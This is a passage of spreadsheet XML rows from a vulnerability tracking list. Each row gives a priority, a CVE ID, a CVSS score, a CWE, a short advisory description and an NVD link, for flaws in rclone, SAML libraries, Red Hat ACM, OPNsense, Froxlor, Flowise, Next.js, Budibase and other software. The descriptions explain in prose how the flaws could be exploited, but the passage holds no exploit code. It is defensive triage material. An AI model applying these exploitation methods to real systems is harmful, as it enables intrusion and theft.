          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. From 1.70.0 until 1.75.1, the serve/start RC interface accepts per-server proxyOpt.AuthProxy settings, and the FTP and S3 constructors in cmd/serve/ftp/ftp.go and cmd/serve/s3/server.go incorrectly check the process-global proxy.Opt.AuthProxy value instead. When the global value is empty, the request-local authentication proxy is ignored: FTP falls back to the fixed filesystem with username anonymous and any password, while S3 with AuthKey serves the fixed RC fs rather than the backend selected by the proxy. The dedicated command-line servers that configure the global option are not affected. This issue is fixed in version 1.75.1.</t>
        </is>
      </c>
      <c r="M694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88044</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89043</t>
        </is>
      </c>
      <c r="C695" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D695" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E695" s="5" t="inlineStr"/>
      <c r="F695" s="5" t="inlineStr"/>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="inlineStr"/>
      <c r="I695" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J695" s="5" t="inlineStr"/>
      <c r="K695" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L695" s="5" t="inlineStr">
        <is>
          <t>passport-saml-encrypted through 0.1.13 contains an XML signature wrapping vulnerability where signature verification and assertion extraction use independent XPath lookups with no cross-validation. Attackers holding any validly signed SAML message can prepend a forged unsigned assertion that gets accepted as the verified identity while the genuine signature validates against the original assertion.</t>
        </is>
      </c>
      <c r="M695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89043</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89086</t>
        </is>
      </c>
      <c r="C696" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D696" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E696" s="5" t="inlineStr"/>
      <c r="F696" s="5" t="inlineStr"/>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="inlineStr"/>
      <c r="I696" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J696" s="5" t="inlineStr"/>
      <c r="K696" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L696" s="5" t="inlineStr">
        <is>
          <t>In the jose package before 0.11.0 for OCaml, library calls to validate an RSA signature only confirm that PKCS #1 decoding succeeds, and proceed to declare the signature valid without the required steps that involve the public key.</t>
        </is>
      </c>
      <c r="M696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89086</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-54603</t>
        </is>
      </c>
      <c r="C697" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D697" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E697" s="5" t="inlineStr"/>
      <c r="F697" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="inlineStr"/>
      <c r="I697" s="5" t="inlineStr">
        <is>
          <t>2025-10-14</t>
        </is>
      </c>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L697" s="5" t="inlineStr">
        <is>
          <t>An incorrect OIDC authentication flow in Claroty Secure Access 3.3.0 through 4.0.2 can result in unauthorized user creation or impersonation of existing OIDC users.</t>
        </is>
      </c>
      <c r="M697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-54603</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10090</t>
        </is>
      </c>
      <c r="C698" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D698" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E698" s="5" t="inlineStr"/>
      <c r="F698" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G698" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H698" s="5" t="inlineStr"/>
      <c r="I698" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J698" s="5" t="inlineStr"/>
      <c r="K698" s="5" t="inlineStr">
        <is>
          <t>CWE-267</t>
        </is>
      </c>
      <c r="L698" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Application Subscription controller (multicluster-operators-subscription) of Red Hat Advanced Cluster Management for Kubernetes (ACM). A user with namespace-scoped "edit" privileges in an ACM hub namespace can create a Channel resource pointing to a Helm repository they control and a Subscription resource referencing it. The app-subscription controller fetches and applies the Helm chart contents with its own elevated authority, without verifying whether the subscription creator holds the "open-cluster-management:subscription-admin" role and without restricting applied resources to the subscription namespace. This allows the attacker to include cluster-scoped resources in the Helm chart, such as a ClusterRoleBinding granting the attacker's ServiceAccount the "cluster-admin" ClusterRole. Successful exploitation results in full cluster-admin privilege escalation. This contradicts the ACM documentation which states that non-subscription-admin users should have resources deployed into the subscription namespace only.</t>
        </is>
      </c>
      <c r="M698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10090</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53581</t>
        </is>
      </c>
      <c r="C699" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D699" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E699" s="5" t="inlineStr"/>
      <c r="F699" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="inlineStr"/>
      <c r="I699" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L699" s="5" t="inlineStr">
        <is>
          <t>OPNsense is a FreeBSD based firewall and routing platform. Prior to version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core, a path traversal vulnerability in the NTP configuration module allows an attacker to overwrite arbitrary files on the system as the root user. By manipulating the GPS or PPS serial port parameter, an attacker with access to the NTP configuration can escape the intended directory and force the system to write user-controlled data to any file on the filesystem. Version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core patch the issue.</t>
        </is>
      </c>
      <c r="M699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53581</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62988</t>
        </is>
      </c>
      <c r="C700" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D700" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E700" s="5" t="inlineStr"/>
      <c r="F700" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="inlineStr"/>
      <c r="I700" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J700" s="5" t="inlineStr"/>
      <c r="K700" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L700" s="5" t="inlineStr">
        <is>
          <t>Froxlor is open source server administration software. From 2.3.7 until 2.3.8, the Customers.get, Customers.listing, Admins.get, Admins.listing, Ftps.get, and Ftps.listing API commands in lib/Froxlor/Api/Commands/Customers.php, lib/Froxlor/Api/Commands/Admins.php, and lib/Froxlor/Api/Commands/Ftps.php retrieve full database rows and return them without removing password and data_2fa fields. An authenticated API caller with permission to use these endpoints can obtain customer, administrator, and FTP password hashes as well as Base32-encoded TOTP seeds for administrator and customer accounts. Password hashes can be cracked offline, and TOTP seeds can generate valid second-factor codes until two-factor authentication is reset. Exposure of both values for an account can enable takeover of the hosting panel or hosted resources and can defeat both authentication factors. This issue is fixed in version 2.3.8.</t>
        </is>
      </c>
      <c r="M700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62988</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66768</t>
        </is>
      </c>
      <c r="C701" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D701" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E701" s="5" t="inlineStr"/>
      <c r="F701" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G701" s="5" t="inlineStr">
        <is>
          <t>java, sap</t>
        </is>
      </c>
      <c r="H701" s="5" t="inlineStr"/>
      <c r="I701" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L701" s="5" t="inlineStr">
        <is>
          <t>SAP GUI for Java does not correctly enforce the trust level policy for certain functions invoked from a connected backend system. A low-privileged attacker could exploit this weakness by manipulating a connected backend system to trigger affected functionality. This could allow arbitrary command execution on the victim's machine, leading to a high impact on the confidentiality, integrity, and availability of the affected system.</t>
        </is>
      </c>
      <c r="M701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67403</t>
        </is>
      </c>
      <c r="C702" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D702" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E702" s="5" t="inlineStr"/>
      <c r="F702" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="inlineStr"/>
      <c r="I702" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L702" s="5" t="inlineStr">
        <is>
          <t>Cash Collect contains an improper authorization vulnerability in the Sage AR Automation API. Insufficient tenant-level authorization checks allow authenticated users to access administrative resources belonging to other tenants by specifying a valid non predictable tenant identifier.</t>
        </is>
      </c>
      <c r="M702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67403</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68484</t>
        </is>
      </c>
      <c r="C703" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D703" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E703" s="5" t="inlineStr"/>
      <c r="F703" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="inlineStr"/>
      <c r="I703" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L703" s="5" t="inlineStr">
        <is>
          <t>Cash Collect contains an improper authorization vulnerability in the Sage AR Automation API. Administrative functions do not properly verify user privileges, allowing authenticated low-privileged users to create administrator accounts and obtain elevated privileges.</t>
        </is>
      </c>
      <c r="M703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68484</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69251</t>
        </is>
      </c>
      <c r="C704" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D704" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E704" s="5" t="inlineStr"/>
      <c r="F704" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G704" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H704" s="5" t="inlineStr"/>
      <c r="I704" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L704" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, Flowise record manager and agent memory nodes allowed users to set arbitrary TypeORM DataSource options through the additionalConfig input in packages/components/nodes/recordmanager/MySQLRecordManager/MySQLrecordManager.ts, packages/components/nodes/recordmanager/PostgresRecordManager/PostgresRecordManager.ts, packages/components/nodes/recordmanager/SQLiteRecordManager/SQLiteRecordManager.ts, packages/components/nodes/memory/AgentMemory/MySQLAgentMemory/MySQLAgentMemory.ts, and packages/components/nodes/memory/AgentMemory/AgentMemory.ts. TypeORM DataSource options such as entities, subscribers, and migrations can load local JavaScript files, allowing an authenticated user to execute arbitrary code on the server by uploading a JavaScript payload and referencing it from additionalConfig.entities. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69251</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69253</t>
        </is>
      </c>
      <c r="C705" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D705" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E705" s="5" t="inlineStr"/>
      <c r="F705" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G705" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H705" s="5" t="inlineStr"/>
      <c r="I705" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J705" s="5" t="inlineStr"/>
      <c r="K705" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L705" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag-and-drop user interface for building customized large language model (LLM) flows. Prior to version 3.1.3, several custom-tool components — AgentAsTool, ChatflowTool, and ExecuteFlow — ran code in the in-process  vm2  sandbox. To build that code, they inserted a user-controlled  baseURL  value straight into the JavaScript source, for example  const url = "${baseURL}/..."; . The only check on  baseURL  was  isValidURL , but a valid-looking URL can still contain characters that break out of a code string. An authenticated user could craft a  baseURL  that passed this check, closed the surrounding string, and injected their own JavaScript into the sandboxed script (code injection, CWE-94). The  vm2  sandbox runs in the same Node.js process as Flowise and exposes risky dependencies. As a result, the injected code could escape the sandbox and run arbitrary code on the Flowise server as the Flowise process user. Exploitation only requires an authenticated session. The issue is fixed in version 3.1.3, which passes the URL to the sandbox as data instead of inserting it into code and adds stricter URL validation.</t>
        </is>
      </c>
      <c r="M705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69253</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="C706" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D706" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E706" s="5" t="inlineStr"/>
      <c r="F706" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G706" s="5" t="inlineStr">
        <is>
          <t>spring, azure</t>
        </is>
      </c>
      <c r="H706" s="5" t="inlineStr"/>
      <c r="I706" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L706" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71851</t>
        </is>
      </c>
      <c r="C707" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D707" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E707" s="5" t="inlineStr"/>
      <c r="F707" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G707" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H707" s="5" t="inlineStr"/>
      <c r="I707" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J707" s="5" t="inlineStr"/>
      <c r="K707" s="5" t="inlineStr">
        <is>
          <t>CWE-331, CWE-334, CWE-338</t>
        </is>
      </c>
      <c r="L707" s="5" t="inlineStr">
        <is>
          <t>crypto-js is a JavaScript library of crypto standards. Versions of crypto-js prior to 4.0.0 generate randomness in CryptoJS.lib.WordArray.random() using a custom variation of the Multiply-With-Carry pseudorandom number generator, seeded from Math.random(), instead of a cryptographically secure source. This generator was introduced in version 3.1.2-4 and remained present in nearly every 3.x release. Nominal requests for 128 or 256 bits of entropy through this function produce effective search spaces of approximately 2 to the 39th and 2 to the 47th possibilities, small enough to enumerate on commodity hardware. Downstream wallet applications that used CryptoJS.lib.WordArray.random() as the entropy source for BIP39 recovery phrases are affected, and an attacker who enumerates the reduced output space can recover the resulting private keys and control the associated funds. This issue is fixed in version 4.0.0.</t>
        </is>
      </c>
      <c r="M707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71851</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73302</t>
        </is>
      </c>
      <c r="C708" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D708" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E708" s="5" t="inlineStr"/>
      <c r="F708" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="inlineStr"/>
      <c r="I708" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J708" s="5" t="inlineStr"/>
      <c r="K708" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L708" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.30, the OIDC flow in packages/backend-core/src/middleware/passport/sso/oidc.ts resolved an email without getEmailVerified or an email_verified requirement, and packages/backend-core/src/middleware/passport/sso/sso.ts then used users.getGlobalUserByEmail as a fallback account-linking key. An attacker who can authenticate through a configured identity provider that asserts a victim email as unverified can have a fresh provider identity merged into the victim Budibase account and inherit the victim roles. This issue is fixed in version 3.39.30.</t>
        </is>
      </c>
      <c r="M708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73302</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73407</t>
        </is>
      </c>
      <c r="C709" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D709" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E709" s="5" t="inlineStr"/>
      <c r="F709" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="inlineStr"/>
      <c r="I709" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L709" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.40.1, RestIntegration._req in packages/server/src/integrations/rest.ts attached credentials from getAuthHeaders and defaultHeaders without requiring the final request destination to match the datasource origin. An unauthenticated caller of a PUBLIC POST /api/v2/queries/:queryId query could supply an absolute or parameterized path to an attacker-controlled host and receive the stored bearer, basic, or static-header credentials. This issue is fixed in version 3.40.1.</t>
        </is>
      </c>
      <c r="M709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73407</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73842</t>
        </is>
      </c>
      <c r="C710" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D710" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E710" s="5" t="inlineStr"/>
      <c r="F710" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G710" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H710" s="5" t="inlineStr"/>
      <c r="I710" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J710" s="5" t="inlineStr"/>
      <c r="K710" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L710" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.0.3, 1.1.3, and 1.2.0-rc.2, internal/cluster-gateway/server.go exposed /api/proxy/, /api/exec/, and /api/wirelogs/ on an internal listener without requiring a client certificate or token, allowing any network-reachable caller to read tenant Kubernetes Secrets, mutate workloads, and execute commands across connected data planes. This issue is fixed in versions 1.0.3, 1.1.3, and 1.2.0-rc.2.</t>
        </is>
      </c>
      <c r="M710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73842</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75604</t>
        </is>
      </c>
      <c r="C711" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D711" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E711" s="5" t="inlineStr"/>
      <c r="F711" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="G711" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H711" s="5" t="inlineStr"/>
      <c r="I711" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L711" s="5" t="inlineStr">
        <is>
          <t>Next.js is a React framework for building full-stack web applications. From 13.4.0 until 15.5.24 and 16.3.3, Next.js applications using Pages Router or App Router without Cache Components on Windows-hosted servers do not consistently escape backslashes in route segments before constructing incremental-cache paths. In packages/next/src/shared/lib/router/utils/escape-path-delimiters.ts and packages/next/src/server/lib/incremental-cache/file-system-cache.ts, a remote request can supply encoded Windows path separators that traverse outside the intended cache root and expose private build data, including the server-reference-manifest encryption key. Disclosure of that key can enable remote code execution in the affected application. This issue is fixed in versions 15.5.24 and 16.3.3.</t>
        </is>
      </c>
      <c r="M711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82021</t>
        </is>
      </c>
      <c r="C712" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D712" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E712" s="5" t="inlineStr"/>
      <c r="F712" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="inlineStr"/>
      <c r="I712" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="L712" s="5" t="inlineStr">
        <is>
          <t>Hermes Agent 0.18.2 prior to 0.19.0 contains a supply chain vulnerability in its bundled MCP catalog that allows a remote attacker to execute arbitrary code by compromising a third-party upstream repository referenced via a mutable branch rather than a pinned commit SHA. An attacker who compromises the upstream repository can propagate malicious code to every host that installs the affected catalog entry, with no further action required by the operator.</t>
        </is>
      </c>
      <c r="M712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82021</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85982</t>
        </is>
      </c>
      <c r="C713" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D713" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E713" s="5" t="inlineStr"/>
      <c r="F713" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="inlineStr"/>
      <c r="I713" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L713" s="5" t="inlineStr">
        <is>
          <t>The Auth0 AD/LDAP Connector is vulnerable to stored Cross-Site Scripting (XSS) issues due to improper HTML encoding of data in search results and updater log content displayed in the admin panel. An authenticated user with privileges to modify directory attributes, or a low-privileged local user on the host where the connector is installed, could insert script content. This script content could then execute in an administrator's browser when they view the affected search results or update logs.</t>
        </is>
      </c>
      <c r="M713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85982</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86259</t>
        </is>
      </c>
      <c r="C714" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D714" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E714" s="5" t="inlineStr"/>
      <c r="F714" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="inlineStr"/>
      <c r="I714" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-918</t>
        </is>
      </c>
      <c r="L714" s="5" t="inlineStr">
        <is>
